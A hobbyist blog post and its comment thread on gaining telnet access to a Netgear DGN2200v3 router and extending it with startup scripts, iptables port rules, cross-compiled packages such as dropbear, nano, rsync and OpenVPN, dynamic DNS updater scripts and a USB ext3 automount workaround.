Mem: 60004 49576 10428 0 3856
Swap: 0 0 0
Total: 60004 49576 10428

# df
Filesystem 1024-blocks Used Available Use% Mounted on
mtd:rootfs 27648 17096 10552 62% /
mtd:factory 256 52 204 20% /config/factory
mtd:scnvram 1024 80 944 8% /config/nvram
mtd:language 1024 468 556 46% /config/language
mtd:xxx 768 68 700 9% /config/xxx

There are especially a few tools that you may find useful for tweaking the router.

• One is wl and permits you to tweak wireless card parameters. One purely visual thing, but I found it annoying to be missing, is to make the wireless led blink when there is some wireless activity (by default it’s just always on). This can be achieved by using the command “wl ledbh 3 7”. A command “wl ledbh 3 14” will keep the led always off and blink just when there is traffic. Try to change the second value between 0 and 15 for various effects. Another more interesting usage for this tool is to change the transmission power to achieve slightly better coverage results. To see the current settings you can use “wl -a wl0 txpwr”. To set a value you can use the “wl -a wl0 txpwr 80” for example to set it to 80mW which is practically the maximum value (by specs at least). Use the –help for a (huge) detailed list of options!
• Another very interesting tool is adslctl. This tool can be used to tweak all the ADSL parameters such as the SNR limits (start –snr) and get additional informations from your link (info –show). Use the –help for a detailed list of options!

Once you are happy with some modifications of course it would be nice to make them stable. If you noticed the mount output the root device is in read-only mode but no fear, just remount it to read-write: mount -n -o remount,rw /

Another important thing to notice is that the  /etc/ is not really on flash but it is just a link to a directory that is in /tmp temporary filesystem and that gets re-populated at every boot from the template in /usr/etc. Therefore if you want to make your modifications permanent to the startup scripts you have to work on /usr/etc. For example, considering also that there is no default editor on the system, if you would like to make the led blinking permanent you could execute something like this:

mount -n -o remount,rw /
cd /usr/etc
echo "/etc/rc.makkapakka &" >> rcS
echo "#!/bin/sh" >> /usr/etc/rc.makkapakka
echo "/bin/sleep 20" >> /usr/etc/rc.makkapakka
echo "/usr/bin/wl ledbh 3 7" >> /usr/etc/rc.makkapakka
chmod a+x /usr/etc/rc.makkapakka

This will append a line to the standard rc_S_ file to execute another custom script (rc.makkapakka) which contains the three lines written with the echo redirected to rc.makkapakka. The last line will make sure the script is executable. You’ll notice that there is a sleep of 20 seconds in the script: this is done since during startup also other processes are running and the wireless module gets reinitialized elsewhere. Of course it’s not the most elegant solution since it’s a hard-coded timing, but it works in practice and should be enough for the example (if you want ADSL parameters to be kept you better make the sleep slightly longer since that part takes more time to be initialized at first).

Of course editing files with just the shell tools (such as echo but also cat,head,tail and grep) is not the most confortable thing in the world. Of course you can pre-edit the files on your PC and then upload them either via FTP or put them via the USB storage available. Otherwise check at the bottom of this page for some pre-crosscompiled packages, there is also the GNU nano editor.

About the firewalling rules:

The DGN2200 has a pretty elaborated firewalling rule set. It is quite elaborate also to permit quite “easy” tear down and reload of rules when they are changed by the user on the web interface. There are some nonstandard modules/rulesets used that make the investigation even furtherly complicated. You can have a look for yourself and work out a bit the logic behind the networking system by using:

iptables -L
iptables -L -t nat

Something that most probably any of you playing with the DGN2200v3 firmware would  want to do is to open a port locally so you can install some service running on the device (for example dropbear or OpenVPN listed below with their binary packages). This sadly cannot be performed via the web interface. The interface will actually permit you to set a “port forwarding” to the IP of the router itself but that will not work for how the rules are then expanded to iptables.
If you would like to open a local port to a running service nevertheless the best, and less invasive, way to do it in my opinion is using the following two rules (that are supposing you’d like to open TCP port 3636):

iptables -A INPUT -p tcp -s 0/0 -d 0/0 --dport 3636 -j ACCEPT
iptables -t nat -I PRE_CNAPT 1 -p tcp -s 0/0 -d 0/0 --dport 3636 -j ACCEPT

The first line is quite obvious and will actually permit the input packets to be accepted. The second one is inserted to prevent the CNAP prerouting rule to drop the packets for that specific port.
Now you can put your favorite TCP service on the 3636 port and have it rechable from the WAN side.

Precompiled packages:

Here are some pre-crosscompiled packages for those that don’t want to mess with the crosscompilation process. I tried to make them as easy to use as possible (so you’ll usually find statically linked versions for example if they depend on other libraries) and install:

• GNU tar and GNU gzip for decompressing the other archives offered later in this page. This two tools are offered uncompressed so you can just download them from your router using the build in busybox based wget tool and then proceed to further installation of other packages without needing a decompressor on your PC or so. (thanks to Stuart for this deployment idea!). The tar will search for gzip in the path so make sure you first add the directory where you downloaded gzip to the path (ie. something like export PATH=$PATH:/path/to/gzip/directory). For some packages a warning that the UID/GID of the original package files cannot be restored will appear: don’t worry too much it’s normal since my UID/GID of my developement system are not present on the router. To unpack the packages listed below just use “tar xfz packagename.tar.gz” (again put also tar into the path or use ./ to execute it from the current working directory). Make sure you set both files as executable (chmod a+x tar gzip) aswell. Download tar and gzip here!
• GNU nano text editor version 2.2.6. This version is statically linked (since it uses the the ncurses 5.9 library). It is important to know that the ncurses library needs the terminal information (terminfo) to start. So in the package you will find also a “vt102” file (the default terminal defined on the DGN2200 at login) that has to be placed in the /opt/toolchains/uclibc-crosstools-gcc-4.4.2-1/share/terminfo/v/ directory. If you need other terminal definitions for some reason you can find them in the ncurses package (or on mostly any Linux desktop installation). The nano executable can be placed where you wish. Download nano-dgn2200-bin.tar.gz here!
• Strace system trace analyzer version 4.7. What else do you need when something doesn’t work and you have to understand what? Here it is, download strace-dgn2200-bin.tar.gz
• Dropbear embedded ssh package version 2012.55. The package should include all you potentially need, so client, server and key management tool. Remember eventually to pass using the “-d” and “-r” options the path to the keys where you generated them (the defaults are in /etc/dropbear and are therefore quite volatile). Download dropbear-dgn2200-bin.tar.gz.
  Make sure you first generate the keys and then specify the path to the keys to the executable, otherwise the defaults are in /etc and they are missing there.
  To create the keys do for example both:
  ./dropbearkey -t rsa -f /tmp/dropbear_rsa_host_key
  and
  ./dropbearkey -t dss -f /tmp/dropbear_dss_host_key
  this will generate the two keys in /tmp (eventually of course you can put them in /opt or other fixed storage).
  Then start dropbear pointing to the keys with:
  ./dropbear -d /tmp/dropbear_dss_host_key -r /tmp/dropbear_rsa_host_key
  Be also aware that by default dropbear accepts only users with a shell listed in the /etc/shells file so if you have troubles connecting with a specific user make sure that the used shell is listed in this file.
  Another warning: by default the admin user doesn’t have a home directory assigned and therefore the dropbear connection may just hang after autentication. Change it’s home directory in the /etc/passwd file (in /usr to make it non-volatile) to / as root (insert a “/” before the last colon of the line)
• OpenVPN 2.2.2 package for creating VPN. To be able to use VPN in some configurations the kernel needs the TUN device support. In the download package you will find the precompiled module tun.ko that you have to load before using the openvpn package (insmod tun.ko). Also remember that you have to create the appropriate /dev/net/tun (char dev, major 10, minopr 200) device. The openvpn has been compiled with the following defines: ENABLE_CLIENT_SERVER ENABLE_DEBUG ENABLE_EUREPHIA ENABLE_FRAGMENT ENABLE_HTTP_PROXY ENABLE_MANAGEMENT ENABLE_MULTIHOME ENABLE_PORT_SHARE ENABLE_SOCKS USE_CRYPTO USE_LIBDL USE_LZO USE_SSL. Please be aware that apart from configuring properly the openvpn configuration files you need to tweak the iptables (system firewall) settings on the router to achieve some useful/interesting results. More about iptables chains on the DGN2200 for OpenVPN later on since it’s not a short story. For now as a hint: make sure you permit the traffic (LOCAL/INBOUND_FILTER_1) for the tap0 device that OpenVPN uses first of all and then forward the private networks behind the tunnel. Download openvpn-dgn2200-bin.tar.gz.
• curl 7.28.1package for advanced file transfers, query generation, various protocols operation and much much more. The default filesystem contains the busybox version of wget which is quite limited (as it should be given it’s a very compact version!). With this package you can manage much much more. The package is compiled with these features:

  # ./curl -V
  curl 7.28.1 (mips-unknown-linux-gnu) libcurl/7.28.1 OpenSSL/1.0.1c
  Protocols: dict file ftp ftps gopher http https imap imaps pop3
  pop3s rtsp smtp smtps telnet tftp
  Features: Largefile NTLM NTLM_WB SSL TLS-SRP

Download curl-dgn2200-bin.tar.gz.

• netcat version 1.10 the TCP/IP Swiss army knife. Very useful tool to debug networking troubles and services. Download netcat-dgn2200-bin.tar.gz
• coreutils version 8.19. This package contains most of the coreutils that are not present as busybox applets in the router and can be very often of use. Some examples are stty for terminal settings management, seq to create sequences at command line, nohup to start processes without a terminal (for nightly uploads and downloads). Here is a list:

  base64    comm     factor     mkfifo  paste     sort    tac       uniq
  basename  csplit   fmt        mktemp  pr        split   tee       uptime
  chgrp     dirname  fold       nice    printenv  stat    timeout   whoami
  chown     du       getlimits  nl      seq       stdbuf  truncate
  chroot    env      id         nohup   shred     stty    tsort
  cksum     expand   join       od      shuf      sum     unexpand

And here is the download coreutils-dgn2200-bin.tar.gz.

• p910nd version 0.93 printer daemon to transform your DGN2200N also in a printer server for your network using an USB printer. I just modified the lockfile to be created at /var/lock instead of /var/lock/subsys to be more compatible with the default router filesystem tree. Download p910nd-dgn2200-bin.tar.gz
• tcpdump version 4.2.1 based on libpcap 1.2.1, the very powerful packet inspector for all your network debugging (and sniffing 😛 ) needs. Download tcpdump-dgn2200-bin.tar.gz.
• rtorrent version 0.9.3 text-based torrent client. Compiled with libtorrent 0.13.3, libsigc++-2.3.1 and curl-7.29.0. Tried and tested to work well, be aware that you may need to play first a bit with iptables for incoming connections (see above in the iptables section how to open a port for local use) to achieve full speed transfers. Be also aware that when you use it over telnet some character sequences may be “eaten up” by the terminal emulator and telnet itself. Check the notes in the Rtorrent User Guide where it explains how to skip the mappings with stty (you can find stty tool crosscompiled for the DGN2200v3 in the coreutils package above). Download rtorrent-0.9.3–dgn2200-bin.tar.gz.
• GNU screen version 4.0.3. Screen/terminal window manager to give you the possibility to use multiple shells/applications at the same time on a single telnet login and especially leave them working unattended after a logout (useful for example for rtorrent posted above or your favourite IRC session!) and resume them later on when you reconnect. The package contains also two termcap definitions (vt100 and vt102) to make the default terminals work (put them into /opt/toolchains/uclibc-crosstools-gcc-4.4.2-1/share/terminfo/v/ since ncurses was compiled to watch for them there). Download screen-4.0.3-dgn2200-bin.tar.gz.
• CIFS filesystem kernel module, so you can mount CIFS/Samba network filesystems on your DGN2200v3. First insert the module (insmod cifs.ko) and then mount the share with something like:

  mount -t cifs //10.36.36.42/test /mnt/shares/U/cifstest/ -o username=guest

or

mount -t cifs //10.36.36.42/test /mnt/shares/U/cifstest/ -o username=user,password=secret

Download cifs-kernel-module-dgn2200-bin.tar.gz.

• rsync 3.0.9 for incremental file/repository transfers. Download it here: rsync-dgn2200-bin.tar.gz
• lua-5.2.2 interpreter and compiler (and liblua.a) to be able to program on your router with this lightweight and very powerfull language. Download it here: lua-5.2.2-dgn2200-bin.tar.gz
• cpuminer 2.3.2: get rich mining bitcoins on your router at a stunning 0.06khash/s rate 😉 Download it here: cpuminer-2.3.2-dgn2200-bin.tar.gz

USB Serial package and connecting Arduino boards

One of the interesting things I wanted to do with my router was also to have the possibility to pilot and monitor some external hardware (using digital I/O and high power relays), do some identification using I-Button devices and in another case be able to do some simple room monitoring (temperatures and so on). Being this things done with some easy to find low cost Arduino based prototype boards a very interesting step for my DGN2200v3 modding was to include the support for the USB serial converter used by this boards to be able to have an easy and cheap way of interaction (of course I could also use a ethernet/wireless shield for the Arduino board, but that would make the board prototypes more expensive and complicated).
So here it comes the precompiled package with all the serial drivers needed: download usbserialftdio-dgn2200-bin.tar.gz. The package includes the generic usbserial module, the specific ftdio_sio module and I also included the stty terminal management tool (from the GNU coreutils 8.19 package) to make it easy to work with the serial port even from the command prompt or using shell scripts.
Once the modules are loaded:

insmod usbserial.ko
insmod ftdi_sio.ko

When the device is attached you should see it detected by looking at the kernel messages, something like:

ftdi_sio 2-1:1.0: FTDI USB Serial Device converter detected
usb 2-1: Detected FT232RL
usb 2-1: FTDI USB Serial Device converter now attached to ttyUSB0
usbcore: registered new interface driver ftdi_sio
ftdi_sio: v1.4.3:USB FTDI Serial Converters Driver

Now the device can be used via the device ttyUSB0 (the device may diffeer depending on what else you have attached to the USB hub). Make sure you create a device to be able to access it since by default is not present:

mknod /dev/ttyUSB0 c 188 0

And then you can access it through /dev/ttyUSB0 device. You can use the stty tool in the package to configure the serial communication parameters, for example to set the baudrate to 9600 which is quite classic in Arudino IDE example files you may play with:

stty -F/dev/ttyUSB0 9600

And then you can even use command line tools such as cat to read or echo to write to the serial from a shell script or command prompt. And now you can expand your DGN2200v3 router to make the connected Arduino board interact with additional electronics and so on with a cheap but very reailable setup .

Of course: needless to say that you can use this usbserial+ftdi_sio package also to connect just a standard USB-232 converter to your router if that is usefull to you! 🙂

Dynamic DNS with other providers

Since June 2014 DynDNS, which is the only officially supported Dynamic DNS service in the DGN2200, is not anymore free and therefore if you don’t want to leave some Euros for this service the router cannot support this service anymore.
But not everything of course is lost, there are a bunch of other possibilities still free out there that should work with little hassle on the DGN2200. I have tried myself no-ip but also DnsDynamic should work. Try to work with this little script that I use for no-ip myself:

#!/bin/sh

LASTIP="first"
LOOPS=0

USERNAME="myusernamehere"
PASSWORD="mypasswordhere"
HOSTNAME="whatever.noip.com"

sleep 120

while true; do
        NEWIP=`ifconfig | grep P-t-P | cut -d":" -f 2 | cut -d" " -f 1`
        # echo "New ip=$NEWIP, old ip=$LASTIP"
        if [ "$NEWIP" != "$LASTIP" ]; then
                #echo "updating..."
                rm /tmp/noipout
                CURLOUT=`/mnt/shares/U/curl -o /tmp/noipout -u $USERNAME:$PASSWORD 
"http://dynupdate.no-ip.com/nic/update?hostname=$HOSTNAME"`
                grep -e "good" -e "nochg" /tmp/noipout
                if [ $? -eq 0 ]; then
                        # echo "good update"
                        LASTIP=$NEWIP
                fi
        fi
        sleep 120
        LOOPS=$((LOOPS+1))

        if [ $LOOPS -ge 60 ]; then
                LASTIP="force"
                LOOPS=0
        fi
done;

The script will loop forever and every 2 minutes it will check if the IP on the outside interface (the NEWIP value) changed. If changed it will use Curl (be aware that you may need to change the path to curl, that you can download from the top part of the article, depending on where you installed it) to send the appropriate query to the server. It will then parse the output returned to see if the update was successfull. Every 60 loops (so every 2 hours) an update will be anyway forced for safety.
For DnsDynamic the script should be quite simillar since the return codes are the same. Be just aware that you need to change the URL used in the previous script to update to something like:

https://www.dnsdynamic.org/api/?hostname=$HOSTNAME&myip=$NEWIP

You can put this script as explained for other tasks in your /usr/etc/rcS (or a custom one) to be executed at boot time (do not forget the & character to put it in background!)
 

Comments

• Davide on 2012-11-26 16:18:30 +0100

Well done! 🙂
I’d like to add the p910nd daemon on the router, can you cross-compile it to make some test please?
And another question: is this sw compatible with dgn2200v1 router (and reverse, too)?

Thanks a lot

D.

• fede on 2012-11-26 16:36:02 +0100

Hello there!
I prepared the p910nd as requested, I just tested that it starts and is alive, didn’t have the possibility to have a printer attached at the moment, but I may try later on 🙂

Please let me know if the package seems to work to you eventuall so I put it in the official list of the post. Here is the link to download.

The binary is derived from version 0.93 available at p910nd project page. I just modified the lockfile to be created at /var/lock instead of /var/lock/subsys to be more compatible with the default firmware.

As for the binary compatibility of the dgn2200v1 router: I don’t have one to check sadly but the CPU is the same MIPS family so if the filesystem has simillar library versions they could be “binary compatible”.

Ciao!

• Davide on 2012-11-27 15:52:34 +0100

Ok! Now I have all binaries in my router, but can’t use them.. :/
I’m quite new on embedded systems so don’t exactly know to do how can I use the binaries.
First of all, I put all binaries in /opt directory, and vt102 in /opt/toolchains/uclibc-crosstools-gcc-4.4.2-1/share/terminfo/v/ directory, but running ./nano I got the message “Error opening terminal: vt102.”
No luck even with p910nd and dropbear daemons, running them I can’t find them alives on running processes list generated by ps command.

Can you explain how do you get them up?

Thanks a lot!! 🙂

• fede on 2012-11-27 16:15:38 +0100

Hello!

For nano please double check the path to the “vt102” file. That error is specific from the ncurses library that can’t find that file to get the terminal definition, so it would all point to the fact that somehow you didn’t copy correctly the file from the message.

For dropbear: make sure you first generate the keys and then specify the path to the keys to the executable, otherwise the defaults are in /etc and they are missing there.

So for the keys do for example both:
./dropbearkey -t rsa -f /tmp/dropbear_rsa_host_key
and
./dropbearkey -t dss -f /tmp/dropbear_dss_host_key
this will generate the two keys in /tmp (eventually of course you can put them in /opt or other fixed storage).

Then start dropbear pointing to the keys with:
./dropbear -d /tmp/dropbear_dss_host_key -r /tmp/dropbear_rsa_host_key
Now you should see it running and accepting connections!

For p910nd if you start it with –help do you see it working? But if you just start “./p910nd” you should see a process p9100d running indeed. Check that you have the /var/lock and /var/run directories in case where it creates some runtime files.

Are you using the v1 or v3 hardware at the end? Which firmware also do you have?

Ciao!

• Davide on 2012-11-28 15:44:27 +0100

Thanks for help! So..

Router: dgn2200v3
Firmware: V1.1.00.10_1.00.10

As you said, a third check was needed for the path, the final “s” of toolchains was missing.. eh ehm.. sorry.. at the end.. nano is correctly working 🙂

dropbear is also working, but at the beginning I couldn’t login with admin or root user, so checking /etc/passwd I discovered that root is the only user. So I simply solve the problem giving a “passwd” command from telnet debug console, choosing a new root password. After I copy the /etc/passwd to /usr/etc/passwd to make it permanent.

As now I can’t print with p910nd daemon :/
It seems the daemon is correctly running as it creates the pid file in /var/run and of course the port 9100 is discoverable from a client host with nmap.
I tried lounching it with a “#p910nd -f /dev/printer0” but I think that I have to tell to the router that he has a printer attached to his USB Host port.. but how should I do it?

See ya! Ciao 😉

• fede on 2012-11-28 18:53:21 +0100

Hello!
Great now nano and dropbear are working 🙂 For dropbear maybe the login problem was also depending on the shell. Dropbear permits a login just from the shells listed in /etc/shells and admin user usually has a shell (/sbin/sh) that is not listed there. So another solution may have been just to add /sbin/sh in the /etc/shells file. I noticed I changed this on my device but forgot to write on the article.

As for the printer you should attach the printer to the USB and check what the kernel is seeing with “dmesg”.
I checked and the USB-Printer driver is compiled in (not as a module but integrated in the kernel). I tried to attach a printer and after some time indeed with “dmesg” command I saw:

usblp0: USB Bidirectional printer dev 2 if 1 alt 0 proto 2 vid 0x04B8 pid 0x080

meaning the printer was seen and recognized as a printer. Try to see if you see something like this. Actually it really depends a lot on the printer model now and how it gets detected. So plug it and check (after some time) with dmesg.

Then as you correctly did you should use /dev/printer0 since that is a device with major/minor 180/0 which is what /dev/usblp0 is usually. You can get this info, if the printer is recognized, also in /sys/class/usb/lp0/dev file. But of course the first step is to see if and how your printer is recognized by the kernel.

Hope it helps!

Ciao,

• luisapulliam@bigstring.com on 2013-01-22 18:29:01 +0100

Hello! Would you mind if I share your blog with my facebook group?

There’s a lot of people that I think would really enjoy your content. Please let me know. Cheers

• mmuy on 2013-02-11 13:22:07 +0100

hi. if i make changes like the transmission power of the router to 80 is it going to be save until the next reboot or it will be saved until i flash another firmware? tnx

• Federico Pellegrin on 2013-02-11 13:39:44 +0100

Hello!
If you followed the article guide after “The modifications will be in place till next reboot of your router. If you want to save them permanently you have to ….” then they will be permanent until you change your firmware.

While if you just typed over telnet the “wl” command then they will get lost at next reboot.

Hope it clears out things 🙂 Eventually let me know,

Ciao,
F.

• Thomas Ragos on 2013-02-13 19:34:39 +0100

First off all many thanks for this awesome guide and software included…

I managed to setup the p910nd daemon and now my DGN2200v3 works as a print server!
All I had to do was to start the daemon with the following:
./p910nd -f /dev/printer0 -i 192.168.1.1
where 192.168.1.1 is the IP of my router on the internal network.

Now to my question…

Is there any way to have the p910nd daemon start automatically when I reboot my router?

Thanks!

• Federico Pellegrin on 2013-02-14 10:42:45 +0100

Hello Thomas!
Thanks for the kind words!

To make it start automatically you have to add it to the end of the rcS script (in /usr/etc). Please check better the article above, after the part “Therefore if you want to make your modifications permanent to the startup scripts you have to work on /usr/etc. For example, considering also that there is no default editor on the system, if you would like to make the led blinking permanent you could execute something like this:”

Of course if you first upload the nano editor supplied you can make it better 😉

So:

1. Mount the filesystem in rw (mount -n -o remount,rw /)

2. Create the shell script for example /usr/etc/rc.thomas and inside put the commands you would like to execute at boot, so for example (notice that you have to put the entire path to the p910nd executable):
   #!/bin/sh
   /mnt/shares/U/p910nd -f /dev/printer0 -i 192.168.1.1

3. Make che script executable (chmod a+x /usr/etc/rc.thomas)

4. At the end of the /usr/etc/rcS script call your script, so at the very bottom just add

/etc/rc.thomas &

Hope it helps,

Ciao,
F.

• Thomas Ragos on 2013-02-14 12:38:25 +0100

Splendid!

I now have my DGN2200v3 as a fully functional print server, without worrying about having to telnet and restart p910nd if I have to reboot :)!

Many thanks once more…

• Federico Pellegrin on 2013-02-14 13:02:18 +0100

Great Thomas!
Thank to you for your positive feedback!

Have fun modifying the router 😉
F.

• Michael Bliss on 2013-02-14 19:54:11 +0100

Is there a way to create a second PPPOE DSL connection on the 2200v3? We have a VPN service here that works on these exact routers as long as they have the custom firmware from the VPN provider, unfortunately I made a mistake and bought a stock replacement one and now I cannot create a second PPPOE connection that is required for the setup of the VPN.

If you can assist me with this I will be eternally grateful.

• Federico Pellegrin on 2013-02-15 07:45:07 +0100

Hello,
From the telnet command line you should have everything on the router, as there is pppoe command:

# pppoe -V
Roaring Penguin PPPoE Version 3.5

And there is kernel support for it. Try to check the usage page on a normal Linux box or on a search engine.
Be aware eventually of filters on iptables in case.

Do you eventually have access to the shell of the VPN provider router? In that case you may try to check over there what is running specifically!

Ciao,
F.

• Thomas Ragos on 2013-02-15 16:59:55 +0100

Hello again Federico…

Today I have another challenge for your skills :).
On my home network I have an IcyBOX NAS that has some SAMBA shares defined.
I’m trying to mount a share on the DGN2200v3 but I get an error that smbfs is not supported by the kernel :(.

Is there any chance for a .ko module that we could insmod to have such support?

• Federico Pellegrin on 2013-02-15 18:17:23 +0100

Welcome back Thomas! 😉

Don’t worry, no problem! Actually smbfs is obsolete from some time, cifs is suggested so I prepared that one for you!
Here it comes: cifs-kernel-module-dgn2200-bin.tar.gz

Just load it with insmod (insmod cifs.ko) and then to mount use something like:

mount -t cifs //10.36.36.42/test /mnt/shares/U/cifstest/ -o username=guest

Of course replace the IP (10.36.36.42 in example) and share name (test in example) and the mountpoint (/mnt/shares/U/cifstest) where you want to mount the share.
If you need authentication then you should do something like -o username=user,password=pass

I tested with a local guest access share from my Linux box and should be ok, let me know if it worked 😉

Ciao!
F.

• Thomas Ragos on 2013-02-15 19:43:57 +0100

Just 3 letters my friend…

WOW!!!

Works like a charm!
I can’t wait to find some time to setup my remote server to backup over SSH directly to my IcyBOX :D…

I honestly can’t thank you enough for your help.

Best regards,

Thomas

• Thomas Ragos on 2013-02-16 09:58:18 +0100

Hello again…

I hope you won’t hate me for keep asking you for things :).
Any chance for an rsync binary so that I can sync my remote server with my NAS?

Dropbear doesn’t have SFTP capabilities 🙁 …

Thanks in advance!

• Federico Pellegrin on 2013-02-16 17:08:19 +0100

Ciao Thomas,
Don’t worry, takes little time for simple packages so no problem at all 🙂

Try here: rsync-dgn2200-bin.tar.gz.

It’s last 3.0.9 version. I just tested it very very briefly since I’m short on time right now, please let me know if it works well so I put it later in the “official” packages list in the article 😉

Ciao!
F.

• Sherry on 2013-02-17 01:13:53 +0100

I like the helpful info you provide in your articles.
I’ll bookmark your weblog and check again here regularly. I am quite sure I’ll learn plenty of new stuff
right here! Good luck for the next!

• Thomas Ragos on 2013-02-17 07:36:19 +0100

rsync is working 100% 😀

My DGN2200v3 now serves as a secured remote backup server (rsync over SSH) attached to my IcyBOX NAS.

Federico rulez!!!

Cheers!

• Federico Pellegrin on 2013-02-17 09:11:35 +0100

Glad it works fine, thanks for the feedback 🙂

• Thomas Ragos on 2013-02-21 06:45:41 +0100

Hello again…

I’m trying to find how I can send an email from the router via command line.
Since from the web interface we can schedule email sending of logs, I suppose there is a mail sending command somewhere.
I tried “mail” and “sendmail” but I only get the “command not found”…

Any hits dear DGN2200v3 guru 🙂 ?

• Federico Pellegrin on 2013-02-21 07:12:36 +0100

Hey Thomas,
The tool already inside the router is “smtpc”. Try to start it without parameters to get an usage pattern:

# smtpc

Usage: ./smtpc [m:s:f:r:h:p:U:P:cv] < files
-m mime type
-s subject
-f from addr (if NULL use recipient)
-r recipient
-h mail server
-p mail port (default=25)
-U user name (ESMTP)
-P password (ESMTP)
-c Clear syslog
-v verbose (DEBUG)

This is the one used for reports configurable from the web interface. It is not too advanced (no SSL etc) but check if it is enough for you.
Later on I was planning to crosscompile msmtp when I have a bit of time 🙂

Ciao!
F.

• Thomas Ragos on 2013-02-21 07:22:39 +0100

Many many thanks Federico!

• Thomas Ragos on 2013-02-22 18:42:27 +0100

Now it’s time for me to share a tip for our DGN2200v3 :).

As you may have noticed, from the web GUI we can only use DynDNS service for dynamic DNS. Unfortunately DynDNS is no longer free (without “trying” a Pro subscription that you have to cancel).

In order to have dynamic DNS, you can created an account to DNSDynamic.
Then, via Telnet/SSH and nano (or simply echo) create a file (e.g. /etc/ddns) with the following content:
export IPADDR=`/usr/sbin/ifconfig ppp1 | grep 'inet addr:' | cut -d':' -f2 | cut -d' ' -f1`<br /> curl --interface ppp1 --insecure "https://:@www.dnsdynamic.org/api/?hostname=&myip=$IPADDR"<br />

Replace with your email as DNSDynamic, with your password and with your hostname.

Then, create an entry in /etc/crontab in order to execute the script every let’s say 5 minutes.
<br /> /usr/sbin/echo "*/5 * * * * root /bin/sh /etc/ddns" >> /etc/crontab<br />

That’s it!

PS:
I still can’t find how to automatically add the cron job upon reboot :(.
Adding it to /etc/usr/crontab didn’t do the trick.
It seems /etc/crontab is overwritten by something else on boot…

• Federico Pellegrin on 2013-02-23 07:53:52 +0100

Thanks Thomas for the very useful information!

One other way to have a free dynamic DNS option that is 100% compatible with Dyndns (actually it’s Dyndns server itself just “rebranded”) is to use the service at https://www.dlinkddns.com (at least until it lasts 🙂 you have to register then it practically creates you one dyndns domain for free… one per account)

I’ll check out the crontab and hopefully let you know something interesting 🙂

Ciao!

• Federico Pellegrin on 2013-02-23 08:30:20 +0100

Hey Thomas,
Did my homework 🙂

Well the crontab file looks like it’s overwritten by the “rc_apps” executable which does most of Netgear “closed source” operations. (there is no source of this file) So “use the source, Luke” didn’t apply!

This said I studied a bit that executable (sometimes the dark side calls you in such moments! 😉 ) and noticed that one of the things it does is also appending at the end of the operations the file /etc/wifi_crontab, if it exists, to the crontab file.
That wifi_crontab file is created when you do WIFI scheduling from the Web interface.

So actually one solution, if you don’t use (or don’t change often since it’s overwritten every time you reconfigure it) the WIFI scheduling is to put your line for crontab in /usr/etc/wifi_crontab and it will be automatically added at every boot.

Hope that is a working solution for you!

Ciao,
F.

• Thomas Ragos on 2013-02-23 14:33:32 +0100

Since I don’t use WiFi scheduling, I’ll go along the wifi_crontab route :).

Thanks for the tip!

• superpippo82xxx on 2013-03-05 17:31:54 +0100

Hi can you help me building iptable roules for openvpn
I’ve vpn working VPN and i can access application running on the router but i can’t access local lan.
Thanks

• Stuart on 2013-03-09 15:39:41 +0100

Thanks for the great info. I notice that the router has wget so I can get your packages straight to it. But it does not have tar and zip. Any chance you could make tar and zip binaries and add them to your list (not tared or zipped themselves obviously 😉

Has anyone managed to get ext2/3 usb storage working on the dgn2200v3? The manual says it should work but it just does not show up as a share. I know the kernel has ext support and can mount my drive manually by telneting in. dmesg shows the drive is detected but it does not mount it. dmesg also shows this:

FAT: utf8 is not a recommended IO charset for FAT filesystems, filesystem will be case sensitive!

So it looks like it tries to mount as FAT even though it is ext (I have tried ext2 and ext3). FAT would be a pain due to the 4gb file limit. I guess I could try NTFS but that just seems wrong on a linux box.

Many thanks,

Stuart

• Federico Pellegrin on 2013-03-10 07:37:30 +0100

Hello Stuart!
I like a lot the a “live” tar idea to make the deployment of additional packages even easier even when lacking a PC with a few tools nearby 🙂
I added in the article body a copy of tar executable uncompressed (and also gzip nearby to handle the gzipped archives) in the ready software!
Thanks for the idea 🙂

As for the mount: you’re correct ext3 is supported in the kernel. The real problem is that the application that manages the mounts (rc_apps, it’s closed source) actually forces NTFS/FAT 🙁
See here:

<br /> mounting %s -> /mnt/shares/%c<br /> /sbin/mkdir -p /mnt/shares/%c<br /> /bin/ntfsmount -o rw,force /dev/%s /mnt/shares/%c<br /> /bin/mount -t vfat -o rw,uid=0,gid=0,umask=000,iocharset=utf8 /dev/%s /mnt/shares/%c<br />

I didn’t check how carefully then it manages to understand if the mount was succesfully, but it may just check the return code probably.

I guess that eventually putting a custom ntfsmount or mount (a shell script with some logic inside) may be a good and clean trick to do the thing 🙂 So for example rename ntfsmount to something else and do a shell script instead of ntfsmount that first tries to mount it as ext3 and if not succesfull calls the old binary… it should work 😉

Hope it was of help,

Ciao!
F.

• Stuart on 2013-03-12 12:05:07 +0100

Thanks for the tar and zip. It worked like a dream with telnet open I could just right click in my browser and copy the link and then paste after a wget in the telnet terminal. Really easy.

I have figured a very cludgy hack to get my ext3 drive shared and survive reboots and hot plugging (not unplugging).

I first append this to /usr/etc/samba.conf/smb.conf:

<br /> [shares]<br /> comment = Shares<br /> writeable = yes<br /> path = /mnt/shares/<br />

This means whenever samba starts it will share the /mnt/shares directory and therefore I can get at any sub-directories.

In order to get the drive to automount I have slightly adapted this script /usr/etc/usb/usb_m.sh

`
….
/bin/sleep 3

#first try to mount ext3
/etc/mountExt.sh $1 $2
if [ $? -eq 0 ]; then
#That script worked so we do not need to continue
exit 0
fi

/usr/sbin/rc usb_service mount $1
....
`

The new bit should be in bold. If the script succeeds then no need to call the closed source mount so we exit with success.

The script itself /usr/etc/mountExt.sh:

`
#!/bin/sh

rmDir() {
if [ "$(ls -A $1)" ]; then
echo "Not empty"
else
rm -r $1
fi
}

SHARES=/mnt/shares/

if [ ! -d $SHARES/$2 ]; then
mkdir $SHARES/$2
fi

mount -t ext3 /dev/"$1"1 $SHARES/$2
if [ $? -ne 0 ]; then
echo "mount borked it"
rmDir $SHARES/$2
exit 200
fi

nmbd
smbd
`

This uses the model name of the drive provided by the mount script. It creates a directory in /mnt/shares. I have no way to check what the file system is so we just try and mount it as ext3. If it succeeds then it was ext3 and we start samba. If it fails then it was not ext3 and we delete the directory (ensuring it is empty). We then return an arbitrary non 0 exit code. The main script will use this to determine whether to continue to try the built in mount script for FAT and NTFS.

It is very hacky but it works for me and survives reboot. Limitations are that it will only try and mount the first partition of a drive. The web GUI also does not know anything about the mounted ext3. It will not show up on the list of shares in the settings and it can not be safely removed from there. The only way to unmount is to telnet in and do it manually.

Hope it is useful for others. It should not interfere with the normal working of the usb sharing but if you have problems you can restore the files from you backups or reflash. I see no reason why it would make the router unbootable but it is your own risk.

• Stuart on 2013-03-13 17:37:37 +0100

